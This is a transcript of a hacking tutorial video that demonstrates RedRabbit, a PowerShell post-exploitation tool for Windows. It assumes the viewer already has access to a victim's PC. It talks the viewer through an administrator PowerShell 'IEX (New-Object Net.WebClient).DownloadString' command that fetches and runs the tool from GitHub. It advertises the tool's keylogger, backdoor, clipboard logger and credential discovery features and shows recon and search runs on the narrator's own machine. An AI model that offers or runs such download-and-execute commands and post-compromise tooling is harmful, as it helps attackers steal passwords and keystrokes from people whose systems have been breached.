Hey, welcome back to another qmark video. So in this video, we're going to be exploring this tool called RedRabbit. So this is a post-recon tool where after you're exploiting a Windows system, using this tool, you'll be able to find all type of information that is existing locally on that system, including the user's FTP account, passwords, and all type of critical information. Even you can find the location, the keystrokes, and even you can execute all type of post-exploit using this tool. Without getting any further delay, let's get into the video and see how I'm going to do that. So assuming you got the victim's PC access right now, inside the browser just search for RedRabbit GitHub and press enter. So now open the first link. So this is the tool what we need. If you want, you can just go through the GitHub profile. Now here just open the RedRabbit 1 and just open the redrabbit.ps1. So this is the file what we want. Just click on the raw format and we need this link. Just copy that link and now open the PowerShell as administrator. Now once you are inside the PowerShell, just type this command IEX open brackets new object space net.web client close the bracket dot download string double quotes, open the double quotes. Now we need this link. So again just copy the link and just paste the link. Now close the double quotes and close the bracket and press enter. Now give it a moment, this tool will run in the background and will show you what type of access you can get from this tool inside this PC. So here you can see you can do a quick recon, and here you can see it has like almost 18 options that you can do, and also additional A, B, C, D option is also available. So you can plan a keylogger, so you can see the DNS information, you can create a backdoor here, and you can have a clipboard logger. So all these are possible with this tool. So now assuming I'm doing a quick recon, so I'm just giving the option 1 and press enter. So now here you can see the result has been loaded. So this gets my local IP configuration details. So I need to blur some information, and you can see here it has given me a lot of information that I didn't even expect it. So here I have the network information, like what is my public IP address, and here I have the system username and stuff. And if I want, I can rerun this tool again. So let me rerun this tool again. Now here let's try some other protocol. Now here let me try a subdomain search called qmark online and press enter. So now this goes through. So now this tool is running the search results. So now this tool has run and this has given me all the qmark related stuff inside this PC. So you can see here some of the files. So this is my previous old domain what I used to use for qmark and all. So here you can see other files it has located. So basically this is like a lot of information. You can search for any word that you're looking at. So you can just type that word and it will get you all type of access related to that word. Okay, let's just rerun this tool. Just press the up arrow and press enter. Now let me try another search called username search. Let me search for qmark. So let this tool run in background. So now here you can see it has found a Twitter result of qmark, Instagram result of qmark, and a Medium result of qmark. So it has showed me some of the social media accounts that's linked with qmark in this PC. And likewise you can search for any name. So to exit this tool, just type clear and type exit and you're done. Thank you. Hey, hope you like this video. If you do so, subscribe to my channel, like this video, share this with your friends. If you want me to work on any future content, do leave your ideas in the comment section. If you want to chat with me personally, yeah, I'm available in Instagram, DM at qmark online, and I'll see you in the next video. Have fun, happy hacking.